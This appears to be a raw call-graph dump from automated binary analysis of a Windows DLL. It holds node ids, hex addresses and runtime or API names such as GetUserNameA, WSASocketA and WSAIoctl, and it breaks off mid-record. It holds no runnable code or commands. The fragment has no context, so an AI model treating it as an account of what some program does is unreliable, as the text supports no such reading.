_lseek_nolock RtlFreeHeap 17148->17149 17150 784d30 17149->17150 17151 784d6c 17150->17151 17155 7895ec _lseek_nolock RtlFreeHeap 17150->17155 17156 784d78 17150->17156 17153 7895ec _lseek_nolock RtlFreeHeap 17151->17153 17151->17156 17153->17156 17158 784d5f 17155->17158 17161 789540 17156->17161 17157 784dc4 17157->17147 17160 7895ec _lseek_nolock RtlFreeHeap 17158->17160 17159 780cc8 _dosmaperr RtlFreeHeap 17159->17157 17160->17151 17162 789554 17161->17162 17163 780d18 _errno RtlFreeHeap 17162->17163 17166 784d98 17162->17166 17164 7895c8 17163->17164 17165 780ca8 __doserrno RtlFreeHeap 17164->17165 17165->17166 17166->17157 17166->17159 17168 76bf09 17167->17168 17169 76bf2c 17168->17169 17171 76bf1d 17168->17171 17181 76bf4c 17169->17181 17174 76d424 17171->17174 17172 76bf2a 17172->17026 17175 76d445 17174->17175 17176 76d451 17175->17176 17177 76d458 17175->17177 17188 76d338 17176->17188 17179 76bf4c _DllMainCRTStartup RtlFreeHeap 17177->17179 17180 76d456 17179->17180 17180->17172 17194 76d474 17181->17194 17184 76bf98 17184->17172 17185 76bf90 17186 77e244 free RtlFreeHeap 17185->17186 17186->17184 17189 76d363 _DllMainCRTStartup 17188->17189 17190 76bf4c _DllMainCRTStartup RtlFreeHeap 17189->17190 17191 76d3d0 17190->17191 17192 76d407 17191->17192 17193 76bf4c _DllMainCRTStartup RtlFreeHeap 17191->17193 17192->17180 17193->17191 17195 77e284 malloc RtlFreeHeap 17194->17195 17197 76d4a2 _DllMainCRTStartup 17195->17197 17196 76bf68 17196->17184 17196->17185 17202 76ded4 17196->17202 17197->17196 17198 76d4f6 17197->17198 17199 76d4ef 17197->17199 17212 779f90 17198->17212 17200 77e244 free RtlFreeHeap 17199->17200 17200->17196 17203 76df08 17202->17203 17206 76df31 17202->17206 17204 77e284 malloc RtlFreeHeap 17203->17204 17207 76df10 17204->17207 17205 76dfa0 17205->17185 17206->17205 17210 76df55 _setmbcp 17206->17210 17255 76dc04 17206->17255 17208 77daa8 _DllMainCRTStartup RtlFreeHeap 17207->17208 17208->17206 17210->17205 17211 76dc04 _DllMainCRTStartup RtlFreeHeap 17210->17211 17211->17205 17215 779fbd _DllMainCRTStartup 17212->17215 17214 77a035 17214->17196 17215->17214 17216 76098c 17215->17216 17218 7609b8 _DllMainCRTStartup 17216->17218 17217 7609d7 17217->17214 17218->17217 17219 77e284 malloc RtlFreeHeap 17218->17219 17220 760a07 17219->17220 17220->17217 17226 763300 17220->17226 17222 760a24 _DllMainCRTStartup 17225 760a52 17222->17225 17238 763170 17222->17238 17223 77e244 free RtlFreeHeap 17223->17217 17225->17223 17228 76332f _DllMainCRTStartup 17226->17228 17227 763352 17227->17222 17228->17227 17229 77e284 malloc RtlFreeHeap 17228->17229 17230 763368 17229->17230 17230->17227 17231 77e284 malloc RtlFreeHeap 17230->17231 17232 763381 17231->17232 17233 76338d 17232->17233 17234 7633c3 _setmbcp _DllMainCRTStartup 17232->17234 17236 7608bc _DllMainCRTStartup RtlFreeHeap 17232->17236 17235 77e244 free RtlFreeHeap 17233->17235 17234->17233 17237 77e244 free RtlFreeHeap 17234->17237 17235->17227 17236->17234 17237->17233 17239 76319d _DllMainCRTStartup 17238->17239 17240 7632c4 17239->17240 17241 77e284 malloc RtlFreeHeap 17239->17241 17240->17225 17242 7631c2 17241->17242 17243 77e284 malloc RtlFreeHeap 17242->17243 17244 7631cd 17243->17244 17245 7632d0 17244->17245 17246 7632c8 17244->17246 17254 7631e2 17244->17254 17245->17240 17248 77e244 free RtlFreeHeap 17245->17248 17247 77e244 free RtlFreeHeap 17246->17247 17247->17245 17248->17240 17249 77e244 free RtlFreeHeap 17250 7632b4 17249->17250 17251 77e244 free RtlFreeHeap 17250->17251 17252 7632bc 17251->17252 17253 77e244 free RtlFreeHeap 17252->17253 17253->17240 17254->17249 17256 76dc4a _snprintf 17255->17256 17280 76de96 _DllMainCRTStartup 17256->17280 17281 7773d0 17256->17281 17258 76dc8b 17259 76dce8 17258->17259 17262 76dcb3 17258->17262 17260 77e63c _snprintf RtlFreeHeap 17259->17260 17266 76dcd8 _snprintf 17260->17266 17261 77e63c _snprintf RtlFreeHeap 17267 76dd1f 17261->17267 17284 7721f4 17262->17284 17265 77e63c _snprintf RtlFreeHeap 17265->17266 17266->17261 17298 776b38 17267->17298 17269 76dd63 17270 76dda6 17269->17270 17304 771d70 17269->17304 17274 76ddd6 17270->17274 17275 76ddc4 17270->17275 17277 77e63c _snprintf RtlFreeHeap 17274->17277 17276 77e63c _snprintf RtlFreeHeap 17275->17276 17278 76ddd4 _DllMainCRTStartup 17276->17278 17277->17278 17278->17280 17314 76dfbc 17278->17314 17280->17210 17282 774fec _DllMainCRTStartup RtlFreeHeap 17281->17282 17283 7773f9 _DllMainCRTStartup 17282->17283 17283->17258 17285 772217 strchr 17284->17285 17286 76dcbc 17285->17286 17287 77e284 malloc RtlFreeHeap 17285->17287 17286->17265 17288 772269 17287->17288 17289 77e284 malloc RtlFreeHeap 17288->17289 17290 772276 _setmbcp _snprintf _DllMainCRTStartup 17289->17290 17292 772342 _setmbcp _snprintf 17290->17292 17318 77f420 17290->17318 17293 7721f4 _DllMainCRTStartup RtlFreeHeap 17292->17293 17294 772446 17293->17294 17295 77e244 free RtlFreeHeap 17294->17295 17296 772460 17295->17296 17297 77e244 free RtlFreeHeap 17296->17297 17297->17286 17299 776b87 _setmbcp _snprintf _DllMainCRTStartup 17298->17299 17300 7772f5 17299->17300 17301 776f29 _setmbcp _snprintf _DllMainCRTStartup 17299->17301 17303 77e63c RtlFreeHeap _snprintf 17299->17303 17300->17301 17302 77e63c _snprintf RtlFreeHeap 17300->17302 17301->17269 17302->17301 17303->17299 17307 771da1 _setmbcp _snprintf strchr 17304->17307 17305 76dd87 17309 771c0c 17305->17309 17306 7721f4 _DllMainCRTStartup RtlFreeHeap 17306->17307 17307->17305 17307->17306 17308 77e63c RtlFreeHeap _snprintf 17307->17308 17308->17307 17312 771c39 _setmbcp _snprintf strchr 17309->17312 17310 771d57 17310->17270 17311 7721f4 _DllMainCRTStartup RtlFreeHeap 17311->17312 17312->17310 17312->17311 17313 77e63c _snprintf RtlFreeHeap 17312->17313 17313->17312 17315 76dfe7 17314->17315 17316 76dff5 17315->17316 17317 77ee04 _DllMainCRTStartup RtlFreeHeap 17315->17317 17316->17278 17317->17316 17319 784844 _getptd RtlFreeHeap 17318->17319 17320 77f429 17319->17320 17320->17292 16149 780b48 16150 780b64 _DllMainCRTStartup 16149->16150 16155 780bf4 16150->16155 16159 780bbe 16150->16159 16161 7809e8 16150->16161 16152 780c12 16154 780c3b 16152->16154 16157 7783e0 _DllMainCRTStartup 12 API calls 16152->16157 16156 7809e8 _CRT_INIT 2 API calls 16154->16156 16154->16159 16155->16159 16192 7783e0 16155->16192 16156->16159 16158 780c2e 16157->16158 16160 7809e8 _CRT_INIT 2 API calls 16158->16160 16160->16154 16162 780a77 16161->16162 16165 7809fa _heap_init 16161->16165 16163 780acd 16162->16163 16166 780a7b _CRT_INIT 16162->16166 16164 780b30 16163->16164 16171 780ad2 _getptd_noexit 16163->16171 16175 780a03 _CRT_INIT _mtterm 16164->16175 16262 784808 16164->16262 16165->16175 16198 7849b0 16165->16198 16166->16175 16224 77ef6c 16166->16224 16171->16175 16250 783728 16171->16250 16174 780a0f _RTC_Initialize 16174->16175 16204 78837c 16174->16204 16175->16155 16176 780aef _getptd_noexit 16176->16175 16178 780b10 16176->16178 16179 780b26 16176->16179 16254 7848ec 16178->16254 16259 77e244 16179->16259 16193 7784bb 16192->16193 16197 778402 _DllMainCRTStartup 16192->16197 16528 77a47c 16193->16528 16195 778407 _DllMainCRTStartup 16195->16152 16197->16195 16476 76ba74 16197->16476 16199 7849bb _mtinit _mtinitlocks 16198->16199 16200 783728 _calloc_crt RtlFreeHeap 16199->16200 16203 784a0e _mtterm 16199->16203 16201 7849ea _getptd_noexit 16200->16201 16202 7848ec _initptd RtlFreeHeap 16201->16202 16201->16203 16202->16203 16203->16174 16206 78839b 16204->16206 16205 780a31 16210 786e40 16205->16210 16206->16205 16266 7837a8 16206->16266 16209 77e244 free RtlFreeHeap 16209->16205 16343 782d8c 16210->16343 16225 77ef83 16224->16225 16226 77efa5 16225->16226 16228 77e244 free RtlFreeHeap 16225->16228 16227 77e244 free RtlFreeHeap 16226->16227 16229 77efb4 16227->16229 16228->16225 16230 77efdb 16229->16230 16232 77e244 free RtlFreeHeap 16229->16232 16231 77e244 free RtlFreeHeap 16230->16231 16233 77efea 16231->16233 16232->16229 16234 77e244 free RtlFreeHeap 16233->16234 16235 77effe 16234->16235 16236 77e244 free RtlFreeHeap 16235->16236 16237 77f00a 16236->16237 16238 77f035 16237->16238 16239 77e244 free RtlFreeHeap 16237->16239 16240 77f056 16238->16240 16241 77e244 free RtlFreeHeap 16238->16241 16239->16238 16242 77f06f 16240->16242 16244 77e244 free RtlFreeHeap 16240->16244 16241->16240 16243 77f0a0 16242->16243 16245 77e244 free RtlFreeHeap 16242->16245 16243->16175 16246 78716c 16243->16246 16244->16242 16245->16243 16248 787187 16246->16248 16247 7871cf 16247->16175 16248->16247 16249 77e244 free RtlFreeHeap 16248->16249 16249->16248 16253 78374d 16250->16253 16252 78378a 16252->16176 16253->16252 16446 788cec 16253->16446 16255 782d8c _lock RtlFreeHeap 16254->16255 16256 784952 _fcloseall 16255->16256 16257 782d8c _lock RtlFreeHeap 16256->16257 16258 784971 _fcloseall __addlocaleref 16257->16258 16258->16175 16260 77e264 _errno _dosmaperr 16259->16260 16261 77e249 RtlFreeHeap 16259->16261 16260->16175 16261->16260 16263 78483e 16262->16263 16264 78481c _getptd_noexit 16262->16264 16263->16175 16450 7846d4 16264->16450 16268 7837d0 16266->16268 16269 783805 16268->16269 16270 77e284 16268->16270 16269->16205 16269->16209 16271 77e318 _callnewh 16270->16271 16277 77e29c _callnewh malloc 16270->16277 16273 780d18 _errno RtlFreeHeap 16271->16273 16274 77e30d 16273->16274 16274->16268 16276 77e2fd 16306 780d18 16276->16306 16277->16274 16277->16276 16279 77e302 16277->16279 16281 780df0 16277->16281 16290 780e64 16277->16290 16280 780d18 _errno RtlFreeHeap 16279->16280 16280->16274 16309 788704 16281->16309 16283 780dfe 16284 780e0d 16283->16284 16285 788704 _set_error_mode RtlFreeHeap 16283->16285 16286 780e64 _NMSG_WRITE RtlFreeHeap 16284->16286 16288 780e2e 16284->16288 16285->16284 16287 780e24 16286->16287 16289 780e64 _NMSG_WRITE RtlFreeHeap 16287->16289 16288->16277 16289->16288 16291 780e98 _NMSG_WRITE 16290->16291 16292 788704 _set_error_mode RtlFreeHeap 16291->16292 16297 780fb5 __crtMessageBoxW failwithmessage _invoke_watson 16291->16297 16293 780eae 16292->16293 16294 788704 _set_error_mode RtlFreeHeap 16293->16294 16293->16297 16295 780ebf 16294->16295 16295->16297 16313 7885b0 16295->16313 16297->16277 16298 780efb 16298->16297 16299 7885b0 _NMSG_WRITE RtlFreeHeap 16298->16299 16302 780f3b _NMSG_WRITE 16298->16302 16299->16302 16301 780f9f 16301->16297 16305 788528 _NMSG_WRITE RtlFreeHeap 16301->16305 16302->16297 16304 780f85 16302->16304 16320 788638 16302->16320 16304->16297 16327 788528 16304->16327 16305->16297 16334 784868 16306->16334 16310 78870c 16309->16310 16311 780d18 _errno RtlFreeHeap 16310->16311 16312 788716 _invalid_parameter_noinfo 16310->16312 16311->16312 16312->16283 16314 7885c8 16313->16314 16315 7885be 16313->16315 16316 780d18 _errno RtlFreeHeap 16314->16316 16315->16314 16318 7885e5 16315->16318 16317 7885d1 _invalid_parameter_noinfo 16316->16317 16317->16298 16318->16317 16319 780d18 _errno RtlFreeHeap 16318->16319 16319->16317 16324 788645 16320->16324 16321 78864a 16322 780d18 _errno RtlFreeHeap 16321->16322 16323 78864f _invalid_parameter_noinfo 16321->16323 16322->16323 16323->16304 16324->16321 16324->16323 16325 788688 16324->16325 16325->16323 16326 780d18 _errno RtlFreeHeap 16325->16326 16326->16323 16328 788543 16327->16328 16330 788539 16327->16330 16329 780d18 _errno RtlFreeHeap 16328->16329 16331 78854c _invalid_parameter_noinfo 16329->16331 16330->16328 16332 78857a 16330->16332 16331->16301 16332->16331 16333 780d18 _errno RtlFreeHeap 16332->16333 16333->16331 16335 784878 _getptd_noexit 16334->16335 16336 780d21 16335->16336 16337 783728 _calloc_crt RtlFreeHeap 16335->16337 16336->16279 16338 78489a _getptd_noexit 16337->16338 16338->16336 16339 7848cd 16338->16339 16340 7848b7 16338->16340 16342 77e244 free RtlFreeHeap 16339->16342 16341 7848ec _initptd RtlFreeHeap 16340->16341 16341->16336 16342->16336 16344 782daa 16343->16344 16345 782daf 16343->16345 16347 782e58 16344->16347 16348 782e75 16347->16348 16350 782e84 malloc 16347->16350 16349 780df0 _FF_MSGBANNER RtlFreeHeap 16348->16349 16351 782e7a 16349->16351 16352 7837a8 _malloc_crt RtlFreeHeap 16350->16352 16361 782e9f 16350->16361 16354 780e64 _NMSG_WRITE RtlFreeHeap 16351->16354 16353 782eb0 16352->16353 16355 782eb8 16353->16355 16356 782ec7 16353->16356 16354->16350 16357 780d18 _errno RtlFreeHeap 16355->16357 16358 782d8c _lock RtlFreeHeap 16356->16358 16357->16361 16359 782ed1 16358->16359 16360 77e244 free RtlFreeHeap 16359->16360 16359->16361 16360->16361 16361->16345 16447 788d01 16446->16447 16449 788d14 _callnewh 16446->16449 16448 780d18 _errno RtlFreeHeap 16447->16448 16447->16449 16448->16449 16449->16253 16451 7846dd 16450->16451 16475 7847fc 16450->16475 16452 7846f8 16451->16452 16453 77e244 free RtlFreeHeap 16451->16453 16454 784706 16452->16454 16455 77e244 free RtlFreeHeap 16452->16455 16453->16452 16456 784714 16454->16456 16457 77e244 free RtlFreeHeap 16454->16457 16455->16454 16458 77e244 free RtlFreeHeap 16456->16458 16459 784722 16456->16459 16457->16456 16458->16459 16460 784730 16459->16460 16461 77e244 free RtlFreeHeap 16459->16461 16462 78473e 16460->16462 16463 77e244 free RtlFreeHeap 16460->16463 16461->16460 16464 78474f 16462->16464 16465 77e244 free RtlFreeHeap 16462->16465 16463->16462 16466 784767 16464->16466 16467 77e244 free RtlFreeHeap 16464->16467 16465->16464 16468 782d8c _lock RtlFreeHeap 16466->16468 16467->16466 16470 784773 16468->16470 16469 7847a0 _fcloseall 16471 782d8c _lock RtlFreeHeap 16469->16471 16470->16469 16472 77e244 free RtlFreeHeap 16470->16472 16473 7847b2 _fcloseall _updatetlocinfoEx_nolock 16471->16473 16472->16469 16474 77e244 free RtlFreeHeap 16473->16474 16474->16475 16475->16263 16540 774fec 16476->16540 16478 76ba92 _DllMainCRTStartup 16479 77e284 malloc RtlFreeHeap 16478->16479 16480 76bb40 16479->16480 16547 77b230 16480->16547 16486 76bbb5 16487 77daa8 _DllMainCRTStartup RtlFreeHeap 16486->16487 16488 76bbcf _DllMainCRTStartup 16487->16488 16490 76bbdd _DllMainCRTStartup 16488->16490 16596 77ca74 16488->16596 16491 76bbf9 16490->16491 16492 77ca74 _DllMainCRTStartup RtlFreeHeap 16490->16492 16570 76e1f8 16491->16570 16492->16491 16495 76bc0e 16576 76e274 16495->16576 16496 77ca74 _DllMainCRTStartup RtlFreeHeap 16496->16495 16499 77ca74 _DllMainCRTStartup RtlFreeHeap 16500 76bc1c 16499->16500 16501 77e284 malloc RtlFreeHeap 16500->16501 16502 76bc4f 16501->16502 16503 76bc5c 16502->16503 16504 77ca74 _DllMainCRTStartup RtlFreeHeap 16502->16504 16505 77daa8 _DllMainCRTStartup RtlFreeHeap 16503->16505 16504->16503 16506 76bc78 16505->16506 16586 774c60 16506->16586 16529 774fec _DllMainCRTStartup RtlFreeHeap 16528->16529 16530 77a4a0 _snprintf _DllMainCRTStartup 16529->16530 16531 77e284 malloc RtlFreeHeap 16530->16531 16532 77a52d _snprintf 16531->16532 16533 77daa8 _DllMainCRTStartup RtlFreeHeap 16532->16533 16534 77a55e _DllMainCRTStartup 16533->16534 16538 77a575 _setmbcp _DllMainCRTStartup 16534->16538 16917 76e014 16534->16917 16536 77a802 _snprintf _DllMainCRTStartup 16536->16195 16537 77e284 malloc RtlFreeHeap 16537->16538 16538->16536 16538->16537 16539 77daa8 _DllMainCRTStartup RtlFreeHeap 16538->16539 16539->16538 16541 77e284 malloc RtlFreeHeap 16540->16541 16542 77500d 16541->16542 16543 77e284 malloc RtlFreeHeap 16542->16543 16546 775015 _snprintf _DllMainCRTStartup 16542->16546 16544 775021 16543->16544 16545 77e244 free RtlFreeHeap 16544->16545 16544->16546 16545->16546 16546->16478 16548 77b259 _DllMainCRTStartup 16547->16548 16602 77f44c 16548->16602 16551 77e284 malloc RtlFreeHeap 16552 77b2a1 _setmbcp _snprintf 16551->16552 16554 77b30a 16552->16554 16605 78081c 16552->16605 16555 78081c _DllMainCRTStartup RtlFreeHeap 16554->16555 16556 76bb87 16555->16556 16557 7724a0 16556->16557 16558 7724b3 _DllMainCRTStartup 16557->16558 16559 77f44c _DllMainCRTStartup RtlFreeHeap 16558->16559 16560 7724bb 16559->16560 16608 771f5c 16560->16608 16563 77daa8 16564 77dae7 16563->16564 16569 77dafd _snprintf 16563->16569 16565 77daf3 16564->16565 16566 77daff 16564->16566 16567 77e284 malloc RtlFreeHeap 16565->16567 16613 780914 16566->16613 16567->16569 16569->16486 16572 76e20e 16570->16572 16571 76bc05 16571->16495 16571->16496 16572->16571 16627 7798dc 16572->16627 16574 76e248 16631 779914 16574->16631 16578 76e299 16576->16578 16577 76bc13 16577->16499 16577->16500 16578->16577 16579 77e284 malloc RtlFreeHeap 16578->16579 16580 76e315 _setmbcp _DllMainCRTStartup 16579->16580 16581 76e36b _snprintf 16580->16581 16582 7798dc _DllMainCRTStartup RtlFreeHeap 16580->16582 16585 77e244 free RtlFreeHeap 16581->16585 16583 76e34c 16582->16583 16584 779914 _DllMainCRTStartup RtlFreeHeap 16583->16584 16584->16581 16585->16577 16587 774c7e _DllMainCRTStartup 16586->16587 16794 77a0b4 16587->16794 16589 774ca8 16590 77f44c _DllMainCRTStartup RtlFreeHeap 16589->16590 16591 774cbf _DllMainCRTStartup 16590->16591 16798 774e28 16591->16798 16593 774d94 _setmbcp _snprintf _DllMainCRTStartup 16807 779bcc 16593->16807 16595 774df5 16597 77ca88 _DllMainCRTStartup 16596->16597 16905 773e24 16597->16905 16601 77caae _DllMainCRTStartup 16603 784844 _getptd RtlFreeHeap 16602->16603 16604 77b261 16603->16604 16604->16551 16606 784844 _getptd RtlFreeHeap 16605->16606 16607 780840 failwithmessage _DllMainCRTStartup 16606->16607 16607->16552 16609 76bb94 16608->16609 16611 771f87 _DllMainCRTStartup 16608->16611 16609->16563 16610 77e284 malloc RtlFreeHeap 16610->16611 16611->16609 16611->16610 16612 77daa8 _DllMainCRTStartup RtlFreeHeap 16611->16612 16612->16611 16614 780938 16613->16614 16615 78092e 16613->16615 16617 78093d 16614->16617 16621 780944 _callnewh 16614->16621 16616 77e284 malloc RtlFreeHeap 16615->16616 16624 780936 _dosmaperr 16616->16624 16618 77e244 free RtlFreeHeap 16617->16618 16618->16624 16619 78098d _callnewh 16620 780d18 _errno RtlFreeHeap 16619->16620 16620->16624 16621->16619 16622 7809cb 16621->16622 16621->16624 16625 7809b2 16621->16625 16623 780d18 _errno RtlFreeHeap 16622->16623 16623->16624 16624->16569 16626 780d18 _errno RtlFreeHeap 16625->16626 16626->16624 16628 7798f7 16627->16628 16630 7798f3 _DllMainCRTStartup 16627->16630 16636 779b54 16628->16636 16630->16574 16632 77e63c _snprintf RtlFreeHeap 16631->16632 16633 77997c 16632->16633 16634 77e63c _snprintf RtlFreeHeap 16633->16634 16635 779992 _DllMainCRTStartup 16634->16635 16635->16571 16643 77e63c 16636->16643 16638 779b71 16639 77e63c _snprintf RtlFreeHeap 16638->16639 16640 779bbc 16639->16640 16652 77ee04 16640->16652 16647 77e66e _snprintf 16643->16647 16644 77e673 16645 780d18 _errno RtlFreeHeap 16644->16645 16650 77e678 _invalid_parameter_noinfo 16645->16650 16646 77e692 16656 781528 16646->16656 16647->16644 16647->16646 16649 77e6c2 16649->16650 16673 78139c 16649->16673 16650->16638 16653 782cec 16652->16653 16777 782ab0 16653->16777 16655 779bc6 16655->16630 16657 780600 strtoxl RtlFreeHeap 16656->16657 16658 78158e 16657->16658 16659 780d18 _errno RtlFreeHeap 16658->16659 16660 781593 16659->16660 16661 781ef3 16660->16661 16669 7815c0 _snprintf 16660->16669 16694 784a54 16660->16694 16662 780d18 _errno RtlFreeHeap 16661->16662 16664 781ef8 _invalid_parameter_noinfo failwithmessage 16662->16664 16664->16649 16666 7829d4 RtlFreeHeap write_char 16666->16669 16667 77e244 free RtlFreeHeap 16667->16669 16668 7837a8 _malloc_crt RtlFreeHeap 16668->16669 16669->16661 16669->16664 16669->16666 16669->16667 16669->16668 16670 788c14 RtlFreeHeap _snprintf 16669->16670 16671 781f48 RtlFreeHeap write_multi_char 16669->16671 16672 782a1c RtlFreeHeap write_string 16669->16672 16698 7876f4 16669->16698 16670->16669 16671->16669 16672->16669 16674 784a54 _fileno RtlFreeHeap 16673->16674 16675 7813be 16674->16675 16676 7813c9 16675->16676 16677 7813e0 16675->16677 16678 780d18 _errno RtlFreeHeap 16676->16678 16679 7813e5 16677->16679 16688 7813f2 _snprintf 16677->16688 16681 7813ce 16678->16681 16680 780d18 _errno RtlFreeHeap 16679->16680 16680->16681 16681->16650 16682 781457 16683 7814ef 16682->16683 16684 781464 16682->16684 16685 785434 _flush RtlFreeHeap 16683->16685 16686 781480 16684->16686 16690 781499 16684->16690 16685->16681 16710 785434 16686->16710 16688->16681 16688->16682 16691 78144b 16688->16691 16701 7889bc 16688->16701 16690->16681 16727 786c08 16690->16727 16691->16682 16707 788a1c 16691->16707 16695 784a5d 16694->16695 16696 784a62 _invalid_parameter_noinfo 16694->16696 16697 780d18 _errno RtlFreeHeap 16695->16697 16696->16669 16697->16696 16699 780600 strtoxl RtlFreeHeap 16698->16699 16700 787706 16699->16700 16700->16669 16702 7889d2 16701->16702 16703 7889c5 16701->16703 16705 780d18 _errno RtlFreeHeap 16702->16705 16706 7889ca _invalid_parameter_noinfo 16702->16706 16704 780d18 _errno RtlFreeHeap 16703->16704 16704->16706 16705->16706 16706->16691 16708 7837a8 _malloc_crt RtlFreeHeap 16707->16708 16709 788a35 16708->16709 16709->16682 16711 78546f 16710->16711 16712 785457 16710->16712 16714 7854e6 16711->16714 16718 7854a1 16711->16718 16747 780ca8 16712->16747 16716 780ca8 __doserrno RtlFreeHeap 16714->16716 16719 7854eb 16716->16719 16717 780d18 _errno RtlFreeHeap 16725 785464 _invalid_parameter_noinfo _unlock_fhandle 16717->16725 16750 7892b0 16718->16750 16721 780d18 _errno RtlFreeHeap 16719->16721 16721->16725 16722 7854a8 16723 780d18 _errno RtlFreeHeap 16722->16723 16722->16725 16724 7854ca 16723->16724 16726 780ca8 __doserrno RtlFreeHeap 16724->16726 16725->16681 16726->16725 16728 786c2b 16727->16728 16733 786c43 16727->16733 16729 780ca8 __doserrno RtlFreeHeap 16728->16729 16731 786c30 16729->16731 16730 786cbd 16732 780ca8 __doserrno RtlFreeHeap 16730->16732 16734 780d18 _errno RtlFreeHeap 16731->16734 16735 786cc2 16732->16735 16733->16730 16736 786c75 16733->16736 16745 786c38 _invalid_parameter_noinfo _unlock_fhandle 16734->16745 16737 780d18 _errno RtlFreeHeap 16735->16737 16738 7892b0 __lock_fhandle RtlFreeHeap 16736->16738 16737->16745 16739 786c7c 16738->16739 16740 786c88 16739->16740 16741 786c9a 16739->16741 16754 786cec 16740->16754 16742 780d18 _errno RtlFreeHeap 16741->16742 16744 786c9f 16742->16744 16746 780ca8 __doserrno RtlFreeHeap 16744->16746 16745->16681 16746->16745 16748 784868 _getptd_noexit RtlFreeHeap 16747->16748 16749 780cb1 16748->16749 16749->16717 16751 7892e8 16750->16751 16753 7892f2 _fcloseall 16750->16753 16752 782d8c _lock RtlFreeHeap 16751->16752 16752->16753 16753->16722 16762 7895ec 16754->16762 16756 786d0b 16757 786d11 16756->16757 16760 786d22 16756->16760 16758 780d18 _errno RtlFreeHeap 16757->16758 16759 786d16 16758->16759 16759->16745 16760->16759 16772 780cc8 16760->16772 16763 7895f5 16762->16763 16766 78960a 16762->16766 16764 780ca8 __doserrno RtlFreeHeap 16763->16764 16765 7895fa 16764->16765 16768 780d18 _errno RtlFreeHeap 16765->16768 16767 780ca8 __doserrno RtlFreeHeap 16766->16767 16771 789602 _invalid_parameter_noinfo 16766->16771 16769 789644 16767->16769 16768->16771 16770 780d18 _errno RtlFreeHeap 16769->16770 16770->16771 16771->16756 16773 784868 _getptd_noexit RtlFreeHeap 16772->16773 16774 780cd9 16773->16774 16775 784868 _getptd_noexit RtlFreeHeap 16774->16775 16776 780cf2 _dosmaperr 16775->16776 16776->16759 16778 780600 strtoxl RtlFreeHeap 16777->16778 16781 782adc 16778->16781 16779 782af7 16782 780d18 _errno RtlFreeHeap 16779->16782 16780 782b0c 16784 782b5e 16780->16784 16787 787618 16780->16787 16781->16779 16781->16780 16786 782afc _invalid_parameter_noinfo 16782->16786 16785 780d18 _errno RtlFreeHeap 16784->16785 16784->16786 16785->16786 16786->16655 16788 780600 strtoxl RtlFreeHeap 16787->16788 16789 78763a 16788->16789 16790 7876f4 _isleadbyte_l RtlFreeHeap 16789->16790 16793 787644 16789->16793 16791 787667 16790->16791 16792 78918c __crtGetStringTypeA RtlFreeHeap 16791->16792 16792->16793 16793->16780 16795 77a0d1 _DllMainCRTStartup 16794->16795 16813 7608bc 16795->16813 16797 77a102 _DllMainCRTStartup 16797->16589 16799 774fec _DllMainCRTStartup RtlFreeHeap 16798->16799 16800 774e51 _DllMainCRTStartup 16799->16800 16801 774e9f GetUserNameA 16800->16801 16802 774ec8 16801->16802 16819 76e008 16802->16819 16804 774ecd strrchr _DllMainCRTStartup 16805 77e63c _snprintf RtlFreeHeap 16804->16805 16806 774fa0 _DllMainCRTStartup 16805->16806 16806->16593 16808 779bfe _setmbcp _DllMainCRTStartup 16807->16808 16808->16808 16826 760cc4 16808->16826 16810 779cba 16812 779d09 16810->16812 16846 760b64 16810->16846 16812->16595 16814 7608ec _DllMainCRTStartup 16813->16814 16815 77e284 malloc RtlFreeHeap 16814->16815 16817 76090d 16814->16817 16818 760921 16815->16818 16816 77e244 free RtlFreeHeap 16816->16817 16817->16797 16818->16816 16818->16817 16820 76e014 _DllMainCRTStartup 16819->16820 16821 76e02f WSASocketA 16820->16821 16822 76e051 16821->16822 16823 76e058 WSAIoctl 16821->16823 16822->16804 16824 76e099 closesocket 16823->16824 16824->16822 16827 760d5e _DllMainCRTStartup 16826->16827 16845 760d77 failwithmessage _DllMainCRTStartup 16827->16845 16850 78de08 16827->16850 16829 760d6f _DllMainCRTStartup 16830 760f0c 16829->16830 16836 760e6d 16829->16836 16829->16845 16831 77e244 free RtlFreeHeap 16830->16831 16833 760f14 16831->16833 16835 763e64 _DllMainCRTStartup RtlFreeHeap 16833->16835 16841 760f40 16835->16841 16857 763e64 16836->16857 16837 760ef3 16839 77e244 free RtlFreeHeap 16837->16839 16838 760efd 16840 77e244 free RtlFreeHeap 16838->16840 16839->16845 16840->16845 16843 763e64 _DllMainCRTStartup RtlFreeHeap 16841->16843 16844 76105c 16841->16844 16841->16845 16842 763e64 _DllMainCRTStartup RtlFreeHeap 16842->16845 16843->16844 16844->16842 16844->16845 16845->16810 16847 760ba5 _DllMainCRTStartup 16846->16847 16848 760b9b _DllMainCRTStartup 16846->16848 16847->16848 16863 76360c 16847->16863 16848->16812 16851 788cec _calloc_impl RtlFreeHeap 16850->16851 16852 78de1d 16851->16852 16853 78de3a 16852->16853 16854 780d18 _errno RtlFreeHeap 16852->16854 16853->16829 16855 78de30 16854->16855 16855->16853 16856 780d18 _errno RtlFreeHeap 16855->16856 16856->16853 16858 763e90 16857->16858 16859 760eea 16858->16859 16860 78de08 calloc RtlFreeHeap 16858->16860 16859->16837 16859->16838 16861 763ecf _DllMainCRTStartup 16860->16861 16861->16859 16862 77e244 free RtlFreeHeap 16861->16862 16862->16859 16864 76363d _DllMainCRTStartup 16863->16864 16865 77e284 malloc RtlFreeHeap 16864->16865 16876 763893 16864->16876 16866 7636ae 16865->16866 16867 77e284 malloc RtlFreeHeap 16866->16867 16868 7636b8 16867->16868 16869 77e284 malloc RtlFreeHeap 16868->16869 16872 7636c3 16869->16872 16870 76389f 16874 77e244 free RtlFreeHeap 16870->16874 16875 7638ac 16870->16875 16871 763897 16873 77e244 free RtlFreeHeap 16871->16873 16872->16870 16872->16871 16877 7636e1 16872->16877 16873->16870 16874->16875 16875->16876 16878 77e244 free RtlFreeHeap 16875->16878 16876->16848 16879 7608bc _DllMainCRTStartup RtlFreeHeap 16877->16879 16878->16876 16885 763723 _setmbcp _snprintf 16879->16885 16880 77e244 free RtlFreeHeap 16881 763883 16880->16881 16882 77e244 free RtlFreeHeap 16881->16882 16883 76388b 16882->16883 16884 77e244 free RtlFreeHeap 16883->16884 16884->16876 16889 763797 _setmbcp 16885->16889 16890 7644f0 16885->16890 16887 7637bf 16887->16887 16888 7644f0 _DllMainCRTStartup RtlFreeHeap 16887->16888 16887->16889 16888->16889 16889->16880 16891 76451c _DllMainCRTStartup 16890->16891 16892 77e284 malloc RtlFreeHeap 16891->16892 16903 764639 16891->16903 16893 76453f 16892->16893 16894 77e284 malloc RtlFreeHeap 16893->16894 16895 76454a 16894->16895 16896 764645 16895->16896 16897 76463d 16895->16897 16904 76455f 16895->16904 16899 77e244 free RtlFreeHeap 16896->16899 16896->16903 16898 77e244 free RtlFreeHeap 